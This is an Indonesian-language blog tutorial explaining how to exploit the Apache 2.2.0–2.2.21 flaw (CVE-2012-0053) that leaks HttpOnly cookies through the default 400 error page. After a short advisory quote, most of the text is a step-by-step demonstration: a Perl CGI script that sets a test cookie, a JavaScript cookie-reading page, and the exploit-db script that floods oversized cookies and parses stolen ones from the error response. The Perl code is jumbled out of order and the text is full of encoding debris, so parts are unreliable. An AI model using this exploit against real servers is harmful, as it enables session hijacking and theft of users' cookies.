Cara Exploit Apache HTTPOnly Cookie
Oleh
chmood
Pada Apache versi 2.20 sampai versi 2.2.21 terdapat kelemahan (vulnerable) sehingga attacker dapat melakukan exploit dengan cara mencuri cookie.
Info lengkap ada di :Β Β http://www.securityfocus.com/bid/51706/discuss
βApache HTTP Server is prone to an information-disclosure vulnerability. The issue occurs in the default error response for status code 400.
Successful exploits will allow attackers to obtain sensitive information that may aid in further attacks.
The vulnerability affects Apache HTTP Server versions 2.2.0 through 2.2.21.β
Berikut akan didemokan cara exploit melalui kelemahan apache tersebut
Langkah 1
Buat file perl dan letakkan di folder cgi-bin (di ubuntu: /usr/lib/cgi-bin):
#!/usr/bin/perluse CGI;use CGI::Cookie;my $cgi = new CGI;my $cookie = CGI::Cookie->new(-name=>'CVE20120053',-value => 'testcookie', -expires => '+3M', -domain => 'localhost',print $cgi->header(-cookie=>$cookie);-path => '/', -secure => 0, -httponly => 0);
Langkah 2
Buat file html untuk membaca cookie:
<html><body><script>alert(document.cookie);</script> </body></html>
Langkah 3
Buka browser dan ketikkan url:Β http://localhost/cgi-bin/setcookie
Kita berhasil membuat cookie
Langkah 4
Buka browser dan ketikkan url:Β http://localhost/httponly/readcookie.html
Kita berhasil untuk membaca cookie dengan meng-injectkan javascript
Langkah 5
Edit file setcookie di cgi-bin folder dan set httponly ke 1
-httponly => 0
ganti nilainya dengan angka 1
-httponly => 1
Langkah 6
Buka browser lagi dan ketikkan url:Β http://localhost/httponly/readcookie.html
Kita gagal melakukan injeksi karena httponly-nya di enable.
Sebagaimana prolog diatas, kita akan melakukan injeksi cookie walaupun httponly-nya di enable
Langkah 7
Buat file injeksi dariΒ http://www.exploit-db.com/exploits/18442/Β sebagai berikut:
// Source: https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08// Most browsers limit cookies to 4k characters, so we need multiplefunction setCookies (good) {Β Β Β Β// Construct string for cookie value
Β Β Β Βvar str = "";
Β Β Β Βfor (var i=0; i<819; i++) {
Β Β Β Β Β Β Β Βstr += "x";
Β Β Β Β}
Β Β Β Β// Set cookies
Β Β Β Βfor (i=0; i < 10; i++) {
Β Β Β Β Β Β Β Β// Expire evil cookie
Β Β Β Β Β Β Β Βif (good) {
Β Β Β Β Β Β Β Β Β Β Β Βvarcookie="xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
Β Β Β Β Β Β Β Β}
Β Β Β Β Β Β Β Β// Set evil cookie
Β Β Β Β Β Β Β Βelse {
Β Β Β Β Β Β Β Β Β Β Β Βvarcookie="xss"+i+"="+str+";path=/";
Β Β Β Β Β Β Β Β}
Β Β Β Β Β Β Β Βdocument.cookie= cookie;
Β Β Β Β}
}function makeRequest() {Β Β Β ΒsetCookies();
Β Β Β Βfunction parseCookies () {
Β Β Β Β Β Β Β Βvar cookie_dict = {};
Β Β Β Β Β Β Β Β// Only react on 400 status
Β Β Β Β Β Β Β Βif (xhr.readyState === 4 && xhr.status === 400) {
Β Β Β Β Β Β Β Β Β Β Β Β// Replace newlines and match <pre> content
Β Β Β Β Β Β Β Β Β Β Β Βvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
Β Β Β Β Β Β Β Β Β Β Β Βif (content.length) {
Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β// Remove Cookie: prefix
Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Βcontent = content[1].replace("Cookie: ", "");
Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Βvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β// Add cookies to object
Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Βfor (var i=0; i<cookies.length; i++) {
Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Βvar s_c = cookies[i].split('=',2);
Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Βcookie_dict[s_c[0]] = s_c[1];
Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β}
Β Β Β Β Β Β Β Β Β Β Β Β}
Β Β Β Β Β Β Β Β Β Β Β Β// Unset malicious cookies
Β Β Β Β Β Β Β Β Β Β Β ΒsetCookies(true);
Β Β Β Β Β Β Β Β Β Β Β Βalert(JSON.stringify(cookie_dict));
Β Β Β Β Β Β Β Β}
Β Β Β Β}
Β Β Β Β// Make XHR request
Β Β Β Βvar xhr = new XMLHttpRequest();
Β Β Β Βxhr.onreadystatechange = parseCookies;
Β Β Β Βxhr.open("GET", "/", true);
Β Β Β Βxhr.send(null);
}makeRequest();
Langkah 8
Buka browser dan ketikkan url:Β http://localhost/httponly/readcookie2.html
Bingo! Kita dapat melakukan injeksi dengan memanfaatkan kelemahan pada Apache.
Sekian Family T.I SniperΒ
Komentar
